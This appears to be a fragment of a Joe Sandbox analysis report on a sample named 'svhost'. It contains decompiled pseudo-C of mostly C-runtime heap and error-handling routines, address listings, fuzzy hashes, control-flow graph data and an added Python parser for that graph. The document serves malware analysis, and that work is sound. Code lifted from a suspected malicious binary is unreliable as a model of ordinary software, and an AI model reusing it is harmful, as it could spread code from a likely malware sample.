                                      																									_t480 = _t480 + 0xc;
                                      																									__eflags = _t332;
                                      																									_t416 = 0 | _t332 == 0x00000000;
                                      																								}
                                      																								_t465[1] = _t416;
                                      																								 *_t465 =  *(_t440 + 8);
                                      																							}
                                      																							 *(_t440 + 0x18) = _t465[1];
                                      																							goto L122;
                                      																						}
                                      																						__eflags = _t431;
                                      																						if(_t431 != 0) {
                                      																							 *_t465 =  *(_t465 + _t431 * 8);
                                      																							_t465[1] =  *(_t465 + 4 + _t431 * 8);
                                      																							 *(_t465 + _t431 * 8) = _v728;
                                      																							 *(_t465 + 4 + _t431 * 8) = _v720;
                                      																						}
                                      																						goto L110;
                                      																					}
                                      																					L122:
                                      																					_t306 = _t375 * 0xc;
                                      																					_t199 = _t306 + 0xecafb8; // 0xe8a7d8
                                      																					 *0xec4320(_t440);
                                      																					_t308 =  *((intOrPtr*)( *_t199))();
                                      																					_t408 = _v736;
                                      																					__eflags = _t308;
                                      																					if(_t308 == 0) {
                                      																						__eflags = _t408 - 0xeef388;
                                      																						if(_t408 != 0xeef388) {
                                      																							_t464 = _t375 + _t375;
                                      																							__eflags = _t464;
                                      																							asm("lock xadd [eax], ecx");
                                      																							if(_t464 != 0) {
                                      																								goto L129;
                                      																							} else {
                                      																								E00EB051F( *((intOrPtr*)(_t440 + 0x28 + _t464 * 8)));
                                      																								E00EB051F( *((intOrPtr*)(_t440 + 0x24 + _t464 * 8)));
                                      																								E00EB051F( *(_t440 + 0xa0 + _t375 * 4));
                                      																								_t411 = _v712;
                                      																								 *(_v724 + _t440) = _t411;
                                      																								 *(_t440 + 0xa0 + _t375 * 4) = _t411;
                                      																							}
                                      																						}
                                      																						_t409 = _v740;
                                      																						 *_t409 = 1;
                                      																						 *((intOrPtr*)(_t440 + 0x28 + (_t375 + _t375) * 8)) = _t409;
                                      																					} else {
                                      																						 *((intOrPtr*)(_v724 + _t440)) = _t408;
                                      																						E00EB051F( *(_t440 + 0xa0 + _t375 * 4));
                                      																						 *(_t440 + 0xa0 + _t375 * 4) = _v748;
                                      																						E00EB051F(_v740);
                                      																						 *(_t440 + 8) = _v752;
                                      																						goto L124;
                                      																					}
                                      																					goto L125;
                                      																				}
                                      																			}
                                      																		} else {
                                      																			L125:
                                      																			_pop(_t441);
                                      																			_pop(_t457);
                                      																			__eflags = _v16 ^ _t470;
                                      																			_pop(_t376);
                                      																			return E00E89A35(_t376, _v16 ^ _t470, _t431, _t441, _t457);
                                      																		}
                                      																		goto L136;
                                      																	}
                                      																	asm("sbb eax, eax");
                                      																	_t290 = _t289 | 0x00000001;
                                      																	__eflags = _t290;
                                      																	goto L93;
                                      																}
                                      															} else {
                                      																_t339 = _t455 + _t455;
                                      																__eflags = _t339 - 0x106;
                                      																if(_t339 >= 0x106) {
                                      																	E00E89FFE();
                                      																	goto L83;
                                      																} else {
                                      																	 *((short*)(_t469 + _t339 - 0x10c)) = 0;
                                      																	_t341 =  &_v276;
                                      																	_push(_t341);
                                      																	_push(_v456);
                                      																	_push(_t436);
                                      																	L84();
                                      																	_t392 = _v452;
                                      																	_t475 = _t477 + 0xc;
                                      																	__eflags = _t341;
                                      																	if(_t341 != 0) {
                                      																		_t392 = _t392 + 1;
                                      																		_v452 = _t392;
                                      																	}
                                      																	L55:
                                      																	_t452 = _t370 + _t455 * 2;
                                      																	_t274 =  *_t452 & 0x0000ffff;
                                      																	_t431 = _t274;
                                      																	__eflags = _t274;
                                      																	if(_t274 != 0) {
                                      																		_t452 = _t452 + 2;
                                      																		__eflags = _t452;
                                      																		_t431 =  *_t452 & 0x0000ffff;
                                      																	}
                                      																	__eflags = _t431;
                                      																	if(_t431 != 0) {
                                      																		continue;
                                      																	} else {
                                      																		__eflags = _t392;
                                      																		if(__eflags != 0) {
                                      																			goto L80;
                                      																		} else {
                                      																			break;
                                      																		}
                                      																		goto L81;
                                      																	}
                                      																}
                                      															}
                                      														}
                                      													} else {
                                      														_t342 = 0x3b;
                                      														__eflags =  *_t370 - _t342;
                                      														if( *_t370 != _t342) {
                                      															break;
                                      														} else {
                                      															goto L49;
                                      														}
                                      													}
                                      												}
                                      											}
                                      											goto L136;
                                      										}
                                      										goto L81;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					} else {
                                      						__eflags = _t452;
                                      						if(_t452 != 0) {
                                      							_push(_t452);
                                      							_push(_t254);
                                      							_push(_t436);
                                      							L84();
                                      						}
                                      						L81:
                                      						_pop(_t437);
                                      						_pop(_t453);
                                      						__eflags = _v12 ^ _t469;
                                      						_pop(_t371);
                                      						return E00E89A35(_t371, _v12 ^ _t469, _t431, _t437, _t453);
                                      					}
                                      				}
                                      				L136:
                                      			}
                                      0x00eaf0ab
                                      0x00eaf0ae
                                      0x00eaf0b0
                                      0x00eaf0b0
                                      0x00eaf0bb
                                      0x00eaf0c1
                                      0x00eaf0c1
                                      0x00eaf0c6
                                      0x00000000
                                      0x00eaf0c6
                                      0x00eaf02a
                                      0x00eaf02c
                                      0x00eaf031
                                      0x00eaf037
                                      0x00eaf040
                                      0x00eaf049
                                      0x00eaf049
                                      0x00000000
                                      0x00eaf02c
                                      0x00eaf0e9
                                      0x00eaf0e9
                                      0x00eaf0ed
                                      0x00eaf0f5
                                      0x00eaf0fb
                                      0x00eaf0fe
                                      0x00eaf104
                                      0x00eaf106
                                      0x00eaf152
                                      0x00eaf158
                                      0x00eaf15f
                                      0x00eaf15f
                                      0x00eaf165
                                      0x00eaf169
                                      0x00000000
                                      0x00eaf16b
                                      0x00eaf16f
                                      0x00eaf178
                                      0x00eaf184
                                      0x00eaf192
                                      0x00eaf198
                                      0x00eaf19b
                                      0x00eaf19b
                                      0x00eaf169
                                      0x00eaf1aa
                                      0x00eaf1b2
                                      0x00eaf1bb
                                      0x00eaf108
                                      0x00eaf10e
                                      0x00eaf118
                                      0x00eaf12a
                                      0x00eaf131
                                      0x00eaf13e
                                      0x00000000
                                      0x00eaf13e
                                      0x00000000
                                      0x00eaf106
                                      0x00eaef61
                                      0x00eaeed9
                                      0x00eaf143
                                      0x00eaf146
                                      0x00eaf147
                                      0x00eaf148
                                      0x00eaf14a
                                      0x00eaf151
                                      0x00eaf151
                                      0x00000000
                                      0x00eaeed7
                                      0x00eaeed0
                                      0x00eaeed2
                                      0x00eaeed2
                                      0x00000000
                                      0x00eaeed2
                                      0x00eaec89
                                      0x00eaec89
                                      0x00eaec8c
                                      0x00eaec91
                                      0x00eaedf9
                                      0x00000000
                                      0x00eaec97
                                      0x00eaec99
                                      0x00eaeca1
                                      0x00eaeca7
                                      0x00eaeca8
                                      0x00eaecae
                                      0x00eaecaf
                                      0x00eaecb4
                                      0x00eaecba
                                      0x00eaecbd
                                      0x00eaecbf
                                      0x00eaecc1
                                      0x00eaecc2
                                      0x00eaecc2
                                      0x00eaecd0
                                      0x00eaecd0
                                      0x00eaecd3
                                      0x00eaecd6
                                      0x00eaecd8
                                      0x00eaecdb
                                      0x00eaecdd
                                      0x00eaecdd
                                      0x00eaece0
                                      0x00eaece0
                                      0x00eaece3
                                      0x00eaece6
                                      0x00000000
                                      0x00eaecec
                                      0x00eaecec
                                      0x00eaecee
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eaecee
                                      0x00eaece6
                                      0x00eaec91
                                      0x00eaec83
                                      0x00eaec56
                                      0x00eaec58
                                      0x00eaec59
                                      0x00eaec5c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eaec5c
                                      0x00eaec54
                                      0x00eaebdc
                                      0x00000000
                                      0x00eaebd0
                                      0x00000000
                                      0x00eaecf4
                                      0x00eaeba3
                                      0x00eaeb98
                                      0x00eaeb8d
                                      0x00eaeb46
                                      0x00eaeb46
                                      0x00eaeb48
                                      0x00eaeb4a
                                      0x00eaeb4b
                                      0x00eaeb4c
                                      0x00eaeb4d
                                      0x00eaeb52
                                      0x00eaedea
                                      0x00eaeded
                                      0x00eaedee
                                      0x00eaedef
                                      0x00eaedf1
                                      0x00eaedf8
                                      0x00eaedf8
                                      0x00eaeb44
                                      0x00000000

                                      APIs
                                        • Part of subcall function 00EB0559: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00E89C45,00000000,?,00E5166C,00000000,?,00E5B6DC,00000000), ref: 00EB058B
                                      • _free.LIBCMT ref: 00EAEA8F
                                      • _free.LIBCMT ref: 00EAEAA6
                                      • _free.LIBCMT ref: 00EAEAC3
                                      • _free.LIBCMT ref: 00EAEADE
                                      • _free.LIBCMT ref: 00EAEAF5
                                      (The LIBCMT suffix is IDA's library-signature naming: these are functions recognised as statically linked C runtime code, so the heap allocation and frees above are runtime bookkeeping rather than logic specific to the sample.)
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: fb1fa4d766c844c09b754aa9d33583a971bb52697b917a2f94c808ac7f79aff4
                                      • Instruction ID: a2afe158bbba447d234e5a29b3f029a275f3457458ecaaa3133ea344de68794d
                                      • Opcode Fuzzy Hash: fb1fa4d766c844c09b754aa9d33583a971bb52697b917a2f94c808ac7f79aff4
                                      • Instruction Fuzzy Hash: 8C519F72A00705AFDB21DF29D842AAA77F5FF49724B146569E409FB390E731FE018B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph (basic block id: start-end address, calls made in the block; successors after ->)
                                      • 471: ea4519-ea453a, call ea467d -> 474, 475
                                      • 474: ea457f -> 477
                                      • 475: ea453c-ea456b, call eb0efc, call eb0af3 -> 481, 482
                                      • 477: ea4581-ea4585
                                      • 481: ea456d-ea4570 -> 484, 485
                                      • 482: ea4586-ea4597, call eb0559 -> 474, 488
                                      • 484: ea4672-ea467c, call ea4980
                                      • 485: ea4576-ea4579 (no outgoing edge in the dump)
                                      • 488: ea4599-ea45b3, call eb0af3 -> 492, 493
                                      • 492: ea45d0-ea45e2 -> 496, 497
                                      • 493: ea45b5-ea45b8 -> 494, 495
                                      • 494: ea45be-ea45c1 -> 495, 500
                                      • 495: ea4670 -> 484
                                      • 496: ea460a-ea4614 -> 498, 499
                                      • 497: ea45e4-ea45ea -> 496, 501
                                      • 498: ea464f-ea466b -> 477
                                      • 499: ea4616-ea461d -> 498, 502
                                      • 500: ea45c7-ea45ce, call eb051f -> 474
                                      • 501: ea45ec-ea4607, call eb051f -> 496
                                      • 502: ea461f-ea462b -> 498, 505
                                      • 505: ea462d-ea4632 -> 498, 508
                                      • 508: ea4634-ea464a, call eb051f -> 498
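The control_flow_graph text above is the plugin's graph flattened into one line, which is hard to query by eye. The following parser is an added example and not part of the Joe Sandbox report or its plugin: it turns that dump into basic blocks and edges and answers the questions an analyst usually has for it (which blocks call a given function, which blocks are reachable from where, which block covers an address). The token grammar is an assumption inferred from the dump shown above (decimal block id followed by a hex address or range, `call <target>` entries belonging to the preceding block, `src->dst` edges); the dump is copied in as constructed input and the helper names are my own.

```python
import re
from collections import deque

# Constructed input: the control_flow_graph line for E00EA4519 copied from the
# report section above (block ids are decimal, addresses are hex).
CFG_DUMP = (
    "control_flow_graph 471 ea4519-ea453a call ea467d 474 ea457f 471->474 "
    "475 ea453c-ea456b call eb0efc call eb0af3 471->475 477 ea4581-ea4585 "
    "474->477 481 ea456d-ea4570 475->481 482 ea4586-ea4597 call eb0559 "
    "475->482 484 ea4672-ea467c call ea4980 481->484 485 ea4576-ea4579 "
    "481->485 482->474 488 ea4599-ea45b3 call eb0af3 482->488 "
    "492 ea45d0-ea45e2 488->492 493 ea45b5-ea45b8 488->493 "
    "496 ea460a-ea4614 492->496 497 ea45e4-ea45ea 492->497 "
    "494 ea45be-ea45c1 493->494 495 ea4670 493->495 494->495 "
    "500 ea45c7-ea45ce call eb051f 494->500 495->484 "
    "498 ea464f-ea466b 496->498 499 ea4616-ea461d 496->499 497->496 "
    "501 ea45ec-ea4607 call eb051f 497->501 498->477 499->498 "
    "502 ea461f-ea462b 499->502 500->474 501->496 502->498 "
    "505 ea462d-ea4632 502->505 505->498 "
    "508 ea4634-ea464a call eb051f 505->508 508->498"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


def parse_cfg(dump):
    """Parse the flattened dump (grammar assumed from the sample above) into
    ({block_id: {"start", "end", "calls"}}, [(src, dst), ...])."""
    tokens = dump.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:                                   # "src->dst"
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok == "call":                        # "call <hex target>", owned by the last block
            if current is None:
                raise ValueError("call before any block definition")
            blocks[current]["calls"].append(int(tokens[i + 1], 16))
            i += 2
        elif tok.isdigit():                        # "<id> <start>[-<end>]"
            addr = ADDR_RE.match(tokens[i + 1])
            if addr is None:
                raise ValueError("bad address after block id %s" % tok)
            start = int(addr.group(1), 16)
            end = int(addr.group(2), 16) if addr.group(2) else start  # single address = one-instruction block
            current = int(tok)
            blocks[current] = {"start": start, "end": end, "calls": []}
            i += 2
        else:
            raise ValueError("unexpected token %r" % tok)
    return blocks, edges


def successors(edges):
    """Adjacency list, preserving the dump's edge order."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    return succ


def predecessors_of(edges, target):
    """Sorted ids of blocks with an edge into `target`."""
    return sorted(src for src, dst in edges if dst == target)


def blocks_calling(blocks, target):
    """Sorted ids of blocks whose call list contains `target` (hex string or int)."""
    if isinstance(target, str):
        target = int(target, 16)
    return sorted(b for b, info in blocks.items() if target in info["calls"])


def reachable(edges, start):
    """Set of block ids reachable from `start` (inclusive) by a breadth-first walk."""
    succ, seen, work = successors(edges), {start}, deque([start])
    while work:
        for nxt in succ.get(work.popleft(), ()):
            if nxt not in seen:
                seen.add(nxt)
                work.append(nxt)
    return seen


def block_for_address(blocks, addr):
    """Id of the block whose address range covers `addr` (hex string or int), else None."""
    if isinstance(addr, str):
        addr = int(addr, 16)
    for b, info in blocks.items():
        if info["start"] <= addr <= info["end"]:
            return b
    return None


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_DUMP)
    succ = successors(edges)
    print("%d blocks, %d edges" % (len(blocks), len(edges)))
    print("blocks calling eb051f:", blocks_calling(blocks, "eb051f"))
    print("blocks without a listed successor:", sorted(b for b in blocks if b not in succ))
    for b in sorted(blocks):
        info = blocks[b]
        print("%3d %x-%x calls=%s -> %s" % (b, info["start"], info["end"],
              ["%x" % c for c in info["calls"]], succ.get(b, [])))
```

Running it shows that the three blocks calling eb051f (500, 501, 508) are the release paths that all funnel back into the ea457f and ea464f-ea466b exits, and that the dump lists no outgoing edge for block 485, which is worth knowing before trusting a reachability answer drawn from the graph alone.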
                                      C-Code - Quality: 76%
                                      			E00EA4519(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                      				intOrPtr _v0;
                                      				char _v8;
                                      				char _v12;
                                      				signed int _v16;
                                      				char _v20;
                                      				signed int _v44;
                                      				char _v80;
                                      				char _v84;
                                      				void* _v93;
                                      				char _v100;
                                      				char _v104;
                                      				char* _v108;
                                      				char _v112;
                                      				void* __ebp;
                                      				intOrPtr* _t72;
                                      				signed int _t73;
                                      				char _t74;
                                      				void* _t77;
                                      				signed int _t82;
                                      				char _t86;
                                      				signed int _t89;
                                      				signed int _t97;
                                      				signed int _t108;
                                      				signed int _t112;
                                      				void* _t113;
                                      				char _t118;
                                      				void* _t122;
                                      				signed int _t127;
                                      				signed int _t128;
                                      				void* _t131;
                                      				signed int _t133;
                                      				signed int _t135;
                                      				signed int _t145;
                                      				void* _t147;
                                      				intOrPtr* _t158;
                                      				intOrPtr _t160;
                                      				void* _t161;
                                      				signed int _t164;
                                      				void* _t168;
                                      				void* _t170;
                                      				void* _t171;
                                      				void* _t172;
                                      
                                      				_push(__ebx);
                                      				_push(__esi);
                                      				_t164 = __ecx;
                                      				_push(__edi);
                                      				_t1 = _t164 + 4; // 0x8b50f845
                                      				_push( *((intOrPtr*)( *_t1)));
                                      				_t72 =  *((intOrPtr*)(__ecx));
                                      				_push( *_t72); // executed
                                      				L22(); // executed
                                      				_t158 = _t72;
                                      				_pop(_t131);
                                      				if(_t158 == 0) {
                                      					L4:
                                      					_t73 = 0;
                                      					goto L5;
                                      				} else {
                                      					_t74 = E00EB0EFC(_t131, __edx);
                                      					_v12 = _t74;
                                      					_t127 = 0;
                                      					_v20 =  *((intOrPtr*)(_t74 + 0x4c));
                                      					_t133 =  *(_t74 + 0x48);
                                      					_t6 =  &_v20; // 0xea474e
                                      					_v16 = _t133;
                                      					_v8 = 0;
                                      					_t77 = E00EB0AF3(0, _t133, __edx,  &_v8, 0, 0, _t158, 0, _t6);
                                      					_t171 = _t170 + 0x18;
                                      					if(_t77 == 0) {
                                      						_t128 = E00EB0559(_v8 + 4);
                                      						__eflags = _t128;
                                      						if(_t128 == 0) {
                                      							goto L4;
                                      						} else {
                                      							_t11 =  &_v20; // 0xea474e
                                      							_t133 = _t11;
                                      							_t13 = _t128 + 4; // 0x4
                                      							_t82 = E00EB0AF3(_t128, _t133, __edx, 0, _t13, _v8, _t158, 0xffffffff, _t133);
                                      							_t171 = _t171 + 0x18;
                                      							__eflags = _t82;
                                      							if(_t82 == 0) {
                                      								_t135 = _t133 | 0xffffffff;
                                      								_t14 =  &_v20; // 0xea474e
                                      								_t160 =  *_t14;
                                      								__eflags =  *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8);
                                      								if(__eflags != 0) {
                                      									asm("lock xadd [edx], eax");
                                      									if(__eflags == 0) {
                                      										E00EB051F( *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8));
                                      										_pop(_t145);
                                      										 *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8) =  *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8) & 0x00000000;
                                      										_t135 = _t145 | 0xffffffff;
                                      										__eflags = _t135;
                                      									}
                                      								}
                                      								_t86 = _v12;
                                      								__eflags =  *(_t86 + 0x350) & 0x00000002;
                                      								if(( *(_t86 + 0x350) & 0x00000002) == 0) {
                                      									__eflags =  *0xeef2c4 & 0x00000001;
                                      									if(( *0xeef2c4 & 0x00000001) == 0) {
                                      										_t89 =  *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164));
                                      										__eflags =  *(_t160 + 0x24 + _t89 * 8);
                                      										if( *(_t160 + 0x24 + _t89 * 8) != 0) {
                                      											asm("lock xadd [eax], ecx");
                                      											__eflags = _t135 == 1;
                                      											if(_t135 == 1) {
                                      												E00EB051F( *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8));
                                      												_t97 =  *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164));
                                      												_t39 = _t160 + 0x24 + _t97 * 8;
                                      												 *_t39 =  *(_t160 + 0x24 + _t97 * 8) & 0x00000000;
                                      												__eflags =  *_t39;
                                      											}
                                      										}
                                      									}
                                      								}
                                      								_t46 = _t128 + 4; // 0x4
                                      								_t73 = _t46;
                                      								 *_t128 =  *((intOrPtr*)(_t160 + 0xc));
                                      								 *(_t160 + 0x24 + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8) = _t128;
                                      								 *((intOrPtr*)(_t160 + 0x1c + ( *((intOrPtr*)( *_t164)) +  *((intOrPtr*)( *_t164))) * 8)) = _t73;
                                      								L5:
                                      								return _t73;
                                      							} else {
                                      								__eflags = _t82 - 0x16;
                                      								if(_t82 == 0x16) {
                                      									L20:
                                      									_t127 = 0;
                                      									__eflags = 0;
                                      									goto L21;
                                      								} else {
                                      									__eflags = _t82 - 0x22;
                                      									if(_t82 == 0x22) {
                                      										goto L20;
                                      									} else {
                                      										E00EB051F(_t128);
                                      										goto L4;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					} else {
                                      						if(_t77 == 0x16 || _t77 == 0x22) {
                                      							L21:
                                      							_push(_t127);
                                      							_push(_t127);
                                      							_push(_t127);
                                      							_push(_t127);
                                      							_push(_t127);
                                      							E00EA4980();
                                      							asm("int3");
                                      							_t168 = _t171;
                                      							_push(_t133);
                                      							__eflags = _v44;
                                      							if(_v44 != 0) {
                                      								_push(_t164);
                                      								_push(_t158);
                                      								_t161 = 0;
                                      								_t108 = E00EB082A( &_v12, 0, 0, _a4, 0x7fffffff);
                                      								_t172 = _t171 + 0x14;
                                      								__eflags = _t108;
                                      								if(_t108 == 0) {
                                      									L27:
                                      									_t164 = E00EB04C2(_v12, 2);
                                      									_pop(_t147);
                                      									__eflags = _t164;
                                      									if(_t164 == 0) {
                                      										L33:
                                      										E00EB051F(_t164);
                                      										return _t161;
                                      									} else {
                                      										_t112 = E00EB082A(_t161, _t164, _v12, _a4, 0xffffffff);
                                      										_t172 = _t172 + 0x14;
                                      										__eflags = _t112;
                                      										if(_t112 == 0) {
                                      											_t113 = E00EAE8FD(_t147, _v0, _t164); // executed
                                      											_t161 = _t113;
                                      											goto L33;
                                      										} else {
                                      											__eflags = _t112 - 0x16;
                                      											if(_t112 == 0x16) {
                                      												goto L34;
                                      											} else {
                                      												__eflags = _t112 - 0x22;
                                      												if(_t112 == 0x22) {
                                      													goto L34;
                                      												} else {
                                      													goto L33;
                                      												}
                                      											}
                                      										}
                                      									}
                                      								} else {
                                      									__eflags = _t108 - 0x16;
                                      									if(_t108 == 0x16) {
                                      										L34:
                                      										_push(_t161);
                                      										_push(_t161);
                                      										_push(_t161);
                                      										_push(_t161);
                                      										_push(_t161);
                                      										E00EA4980();
                                      										asm("int3");
                                      										_push(_t168);
                                      										E00EB192F();
                                      										_v112 =  &_v84;
                                      										_v108 =  &_v80;
                                      										_t118 = 4;
                                      										_v100 = _t118;
                                      										_v104 = _t118;
                                      										_push( &_v100);
                                      										_push( &_v112);
                                      										_push( &_v104); // executed
                                      										_t122 = E00EA44BE(_t127, _t161, _t164, __eflags); // executed
                                      										return _t122;
                                      									} else {
                                      										__eflags = _t108 - 0x22;
                                      										if(_t108 == 0x22) {
                                      											goto L34;
                                      										} else {
                                      											goto L27;
                                      										}
                                      									}
                                      								}
                                      							} else {
                                      								return E00EAE8FD(_t133, _v0, 0);
                                      							}
                                      						} else {
                                      							goto L4;
                                      						}
                                      					}
                                      				}
                                      			}

                                      Instruction addresses for the listing above: 0x00ea4521 to 0x00ea4680 (the per-line address column, collapsed)
                                      0x00ea4682
                                      0x00ea4683
                                      0x00ea4687
                                      0x00ea4697
                                      0x00ea4698
                                      0x00ea46a1
                                      0x00ea46a9
                                      0x00ea46ae
                                      0x00ea46b1
                                      0x00ea46b3
                                      0x00ea46bf
                                      0x00ea46c9
                                      0x00ea46cc
                                      0x00ea46cd
                                      0x00ea46cf
                                      0x00ea4700
                                      0x00ea4701
                                      0x00ea470c
                                      0x00ea46d1
                                      0x00ea46db
                                      0x00ea46e0
                                      0x00ea46e3
                                      0x00ea46e5
                                      0x00ea46f7
                                      0x00ea46fe
                                      0x00000000
                                      0x00ea46e7
                                      0x00ea46e7
                                      0x00ea46ea
                                      0x00000000
                                      0x00ea46ec
                                      0x00ea46ec
                                      0x00ea46ef
                                      0x00000000
                                      0x00ea46f1
                                      0x00000000
                                      0x00ea46f1
                                      0x00ea46ef
                                      0x00ea46ea
                                      0x00ea46e5
                                      0x00ea46b5
                                      0x00ea46b5
                                      0x00ea46b8
                                      0x00ea470d
                                      0x00ea470d
                                      0x00ea470e
                                      0x00ea470f
                                      0x00ea4710
                                      0x00ea4711
                                      0x00ea4712
                                      0x00ea4717
                                      0x00ea471a
                                      0x00ea4720
                                      0x00ea4728
                                      0x00ea4733
                                      0x00ea4736
                                      0x00ea4737
                                      0x00ea473a
                                      0x00ea4740
                                      0x00ea4744
                                      0x00ea4748
                                      0x00ea4749
                                      0x00ea474f
                                      0x00ea46ba
                                      0x00ea46ba
                                      0x00ea46bd
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea46bd
                                      0x00ea46b8
                                      0x00ea4689
                                      0x00ea4696
                                      0x00ea4696
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea4570
                                      0x00ea456b

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • _free.LIBCMT ref: 00EA45C8
                                      • _free.LIBCMT ref: 00EA45F6
                                      • _free.LIBCMT ref: 00EA463E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast
                                      • String ID: NG
                                      • API String ID: 3291180501-1393662826
                                      • Opcode ID: f14ec22a7d0dfb598cdaa37bb9d3381a1302934e4913bdd21db6aefcb44de16e
                                      • Instruction ID: 1ff9fddf59654772bff2c5430211ca66a1290b104b3b2230469a424abfb46169
                                      • Opcode Fuzzy Hash: f14ec22a7d0dfb598cdaa37bb9d3381a1302934e4913bdd21db6aefcb44de16e
                                      • Instruction Fuzzy Hash: 5041BEB16001059FDB24DFACC881AA6B3E9FF8E318B24056DE405EB291DBB1FC109B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      C-Code - Quality: 69%
                                      			E00E55350(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
                                      				char _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v72;
                                      				char _v76;
                                      				signed char _v77;
                                      				intOrPtr _v84;
                                      				intOrPtr* _v88;
                                      				intOrPtr* _v92;
                                      				intOrPtr _v96;
                                      				void* __ebp;
                                      				signed int _t51;
                                      				signed int _t52;
                                      				void* _t64;
                                      				void* _t71;
                                      				void* _t105;
                                      				void* _t106;
                                      				signed int _t107;
                                      
                                      				_t106 = __esi;
                                      				_t105 = __edi;
                                      				_t76 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0400);
                                      				_push( *[fs:0x0]);
                                      				_t51 =  *0xeef074; // 0x221cac15
                                      				_t52 = _t51 ^ _t107;
                                      				_v20 = _t52;
                                      				_push(_t52);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v84 = __ecx;
                                      				_v77 = 0;
                                      				_push(0);
                                      				E00E76652();
                                      				_t112 = _a8;
                                      				if(_a8 != 0) {
                                      					_v76 =  *((intOrPtr*)(_v84 + 4));
                                      					_v8 = 0;
                                      					E00E515C0( &_v72, 0x34);
                                      					_t64 = E00E57E90();
                                      					_t100 = _a8;
                                      					E00E55180(__ebx, _t105, _t112, _a8, _t64);
                                      					_v8 = 1;
                                      					if((E00E555A0(_v84, _t112,  &_v72) & 0x000000ff) == 0) {
                                      						_push(0);
                                      						_push( *((intOrPtr*)(_v84 + 4)));
                                      						_push(_a8);
                                      						_push( &_v72); // executed
                                      						L00E74D55( &_v72, _t106); // executed
                                      						_t100 = _a8;
                                      						 *((intOrPtr*)( *((intOrPtr*)(_v84 + 4)) + 0x10)) = _a8;
                                      						_t71 = E00E57E90();
                                      						__eflags =  *((intOrPtr*)(_v84 + 4)) + 0x18;
                                      						E00E56770( *((intOrPtr*)(_v84 + 4)) + 0x18, _t71);
                                      					} else {
